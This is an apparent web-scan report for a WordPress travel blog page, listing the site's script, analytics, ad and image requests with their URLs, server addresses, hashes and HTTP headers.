date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/themes/zerif-lite/images/telephone65-blue.png
content-type: text/html; charset=UTF-8
cdn-cache: EXPIRED
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: be8cdab772cea11aa9c0717629de73aa
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2 200 email-decode.min.js Show response
www.itravelrox.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/ 1 KB
1 KB 12ms
7ms Script
application/javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL

https://www.itravelrox.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),

Reverse DNS

Software

cloudflare /

Resource Hash

2595496fe48df6fcf9b1bc57c29a744c121eb4dd11566466bc13d2e52e6bbcc8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Frame-Options	DENY

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: gzip
x-content-type-options: nosniff
nel: {"max_age":604800,"report_to":"cf-nel"}
cf-request-id: 0932292f9300004ddc54b59000000001
last-modified: Mon, 29 Mar 2021 13:37:44 GMT
server: cloudflare
x-frame-options: DENY
etag: W/"6061d828-4d7"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=38sLEDKFOf1%2B91M5wc3KrLLs9qIe7A%2BRGeWScCz1bwOSuAMXBagXAPu6VvGkrpmipgfA3B0EIK4%2B5X34rumkkPn3DF5inx7%2BH7QQjZlPNt5SrvPkbscMLOROFaUVxEQ%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/javascript
cache-control: max-age=172800, public
cf-ray: 6396de2c1e754ddc-FRA
expires: Sun, 04 Apr 2021 03:11:05 GMT

GET
H2 200 lazysizes.min.js Show response
www.itravelrox.com/wp-content/plugins/autoptimize/classes/external/js/ 7 KB
4 KB 54ms
53ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/autoptimize/classes/external/js/lazysizes.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 5ac992726ee0cbebaca73d65075ea438cd458c3298a9ae3340dc1e1a0141f79f

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292fef00004ddc222d0000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 12:32:58 GMT
server: cloudflare
etag: W/"1b29-5d19fd7a-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sDFsmToAcxZFCjXlH6xLQeWvojf5UX5pakSaN9Q0ZV3D10ho%2Bcsl%2BeeNxWRnlMg7q9r0ICFoUGBFL2aO1nXlfqYa34TxU9ajOFDRv7zjUExpQieT%2BL1%2FnFjdSwoYt0c%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2cbf304ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 scripts.js Show response
www.itravelrox.com/wp-content/plugins/contact-form-7/includes/js/ 14 KB
4 KB 53ms
52ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/contact-form-7/includes/js/scripts.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: b7e17926b30342edecee8b3a93029ac51462e2b479277d8e077ba57173eb1900

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292ff000004ddc7923e000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 12:33:17 GMT
server: cloudflare
etag: W/"3868-5d19fd8d-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=swg%2BvS37y%2FzYTOtjLvdw5aKGTgNomI1RNGLTYuWGsDYCx4gYqzw8DbMJIIe8HP3%2ByCqUUtQvpWBgw2qT1QC43hsAS8Yd5XSkxsppnjxen8lZQZgASLnE%2Bviiy43bfMU%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2cbf364ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 bootstrap.min.js Show response
www.itravelrox.com/wp-content/themes/zerif-lite/js/ 28 KB
7 KB 59ms
58ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/js/bootstrap.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: d20b448336f0aae1c31561b9066a643c04f21a59b55f84bf38231ebd26ac0fdc

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 093229302700004ddc71ae1000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"71c0-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=GireGLSDaXiUii6%2BEA9XkWARauMi7A7CPbEMxK7ipE0Gdrk3mIMsPh6tMKdGuYG%2FAhOzRRqF0cVywMZWq%2BA299gVi%2FZ2BheYeaKeGRwwL7fA7xPCsl129xUZNOkvVzI%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2d0f7f4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 jquery.knob.js Show response
www.itravelrox.com/wp-content/themes/zerif-lite/js/ 26 KB
5 KB 58ms
57ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/js/jquery.knob.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: e5807dcc7d9367937c1f4d5a15eba7df8f1b953048cf5ac789ab9bceb3ed890c

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 093229302700004ddc41154000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"66fe-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=N8W7z1QPw1iZNzwQDggBLeuArNEnQZpXCk3NfdpzLZHFRIhS5%2FzbQiJMFp%2BYbMffSM99fo4SoqajlzslcG0i1f4BNM06rkEovEQ5nmWI1yNIVO8gN9o4hGtTGFjYh68%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2d0f804ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 smoothscroll.js Show response
www.itravelrox.com/wp-content/themes/zerif-lite/js/ 8 KB
2 KB 58ms
56ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/js/smoothscroll.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 35fe37518ba0ef737ca2ba68e069f3a789e476d3b1ba940f67b34242b55311cd

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 093229306100004ddc82920000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"1f2c-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LFEFsqe9W345vWlcCV0EnohI7FvpLJijS3fX82ZNRjCLVz%2FrYNMCQJ6j7xzHAE7MF6PhRp%2F1vrJHpH9gvSoAw5mUNa%2FQdZCoKhJ1sFigMJrl4sjS%2Fz5QXxykl7DNmQM%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2d6fea4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 scrollReveal.js Show response
www.itravelrox.com/wp-content/themes/zerif-lite/js/ 9 KB
2 KB 53ms
53ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/js/scrollReveal.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 5ba6d84c70e30e44c042f3cc95be17d3c819117f8cf73476ade7330b1b346c06

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 093229306200004ddc46ad7000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"239a-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vnk6vGWpabPloHjZFipuejaxyZioM4PwOTvgUvkVBaHUYpO28rtSyIdC24pukpAqChV3IgbOnahn1NaOQ6nridRDy%2FneYnCOy97O%2Fpqv1smMGnWMgiz4ZnH13a5RCA0%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2d6feb4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 zerif.js Show response
www.itravelrox.com/wp-content/themes/zerif-lite/js/ 27 KB
6 KB 56ms
55ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/js/zerif.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: fe482dadec155ae4fb32d2861108fb20f2879d23898ee9990c8299b8f4dae199

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 093229307c00004ddc79244000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: W/"6a0a-5799af21-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qkn0L9B80T6pIbGN0b0fHQqG3Jm3%2FX5oOMlIPiJpGuqekp40wTegGi4x%2BDDgPoei4%2FXuQ%2BBSiybzPPY4CXPXQeJPFAwMDNdN3W0nEI%2B1UwHLOjuSppI9hgMRMj%2BWNj8%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2d98124ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 comment-reply.min.js Show response
www.itravelrox.com/wp-includes/js/ 2 KB
1 KB 49ms
48ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-includes/js/comment-reply.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 31cb76c05cbf5d71466f93078e8ba0f6e39cd92d0acc86d385b8cf2899963695

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 093229309800004ddc1b8c9000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 13:03:10 GMT
server: cloudflare
etag: W/"8ba-5d1a048e-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uqdC7Kmk%2FG6wrtx18p4rodzG9Jj%2BZFo3%2B39%2Fi4oIYDBn5tPHn3SyWq6rXZLh9bdUB5%2BJTJvJASnoX6oH%2F0mPbWx6IdjpCjD7qO3qT8R3RjtAIEwbd9KrWxGtSj%2BeLjo%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2db84b4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 fitvids.min.js Show response
www.itravelrox.com/wp-content/plugins/youtube-embed-plus/scripts/ 2 KB
1 KB 61ms
60ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/youtube-embed-plus/scripts/fitvids.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 9aa8a04fabdda76673b068b2f5e6f5fb3b82039baa72f80b0582a58bbfd10395

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 093229309b00004ddc9a396000000001
referrer-policy
last-modified: Sat, 05 Oct 2019 11:10:54 GMT
server: cloudflare
etag: W/"75b-5d987a3e-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1cM7rQG9ipFZdBF3AOBtK7AaA%2Bp2mtoEeORjommvHR635oQGJl0notUCvym7ZFihQqg6n3WIGMvYUEzRLUx36WSN%2FY%2FO1D5WEEo7G6I9odQg4IsKOoxxQ1BWYV%2FhEOc%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2dc84d4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 wp-embed.min.js Show response
www.itravelrox.com/wp-includes/js/ 1 KB
978 B 53ms
48ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-includes/js/wp-embed.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 2152557cac69e2bd7d6debef5037a9f554f9209cc305b8141b3329acb10c42b7

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 09322930b400004ddc61b6a000000001
referrer-policy
last-modified: Thu, 13 Dec 2018 03:01:06 GMT
server: cloudflare
etag: W/"57b-5c11cb72-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=CO8IFvMsxpagsJKQYzxEJpsdCc8izLe8AG7zhb%2F%2FomfhfNUhp4UtvpIHS0Tv1KhlofDAHCoQoAcQYrehMCxVtUMrX%2BTzhO4HU6KJYXWaVck9THOXiDBTta5MzRbKaU4%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2de87e4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 analytics.js Show response
www.google-analytics.com/ 48 KB
19 KB 14ms
5ms Script
text/javascript 2a00:1450:4001:82b::200e
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google-analytics.com/analytics.js

Requested by

Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/js?id=UA-32708500-1

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:82b::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

f79723478f4c48501cd49ac52b81d6244a6562b9d3f08ce8ab208a8b8878d4c4

Security Headers

Name	Value
Strict-Transport-Security	max-age=10886400; includeSubDomains; preload
X-Content-Type-Options	nosniff

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=10886400; includeSubDomains; preload
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Fri, 19 Mar 2021 19:22:18 GMT
server: Golfe2
age: 3358
date: Fri, 02 Apr 2021 02:15:07 GMT
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7200
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 19463
expires: Fri, 02 Apr 2021 04:15:07 GMT

GET
H3-Q050 200 show_ads_impl_with_ama_fy2019.js Show response
pagead2.googlesyndication.com/pagead/js/r20210331/r20190131/ 225 KB
84 KB 30ms
29ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/pagead/js/r20210331/r20190131/show_ads_impl_with_ama_fy2019.js?client=ca-pub-6761611880351053&plah=www.itravelrox.com&amaexp=1

Requested by

Host: pagead2.googlesyndication.com
URL: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

7ee65ec4e6687e75cf0082dffb5a452a42d4353263efe439959072d89b7f437b

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: gzip
x-content-type-options: nosniff
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 86022
x-xss-protection: 0
server: cafe
etag: 6413673484793450264
vary: Accept-Encoding
content-type: text/javascript; charset=UTF-8
cache-control: private, max-age=3600, stale-while-revalidate=3600
timing-allow-origin: *
expires: Fri, 02 Apr 2021 03:11:05 GMT

GET
H2 200 search_icon.png
www.itravelrox.com/wp-content/themes/zerif-lite/images/ 445 B
812 B 51ms
51ms Image
image/png 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/images/search_icon.png
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/wp-content/themes/zerif-lite/style.css
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 34a8e43bcf57839f47d14209a021ad5fb637b0028108971295096e2ea355ca54

Request headers

Referer: https://www.itravelrox.com/wp-content/themes/zerif-lite/style.css
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 445
cf-request-id: 093229304800004ddc4d3c2000000001
referrer-policy
last-modified: Thu, 28 Jul 2016 07:07:13 GMT
server: cloudflare
etag: "1bd-5799af21-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
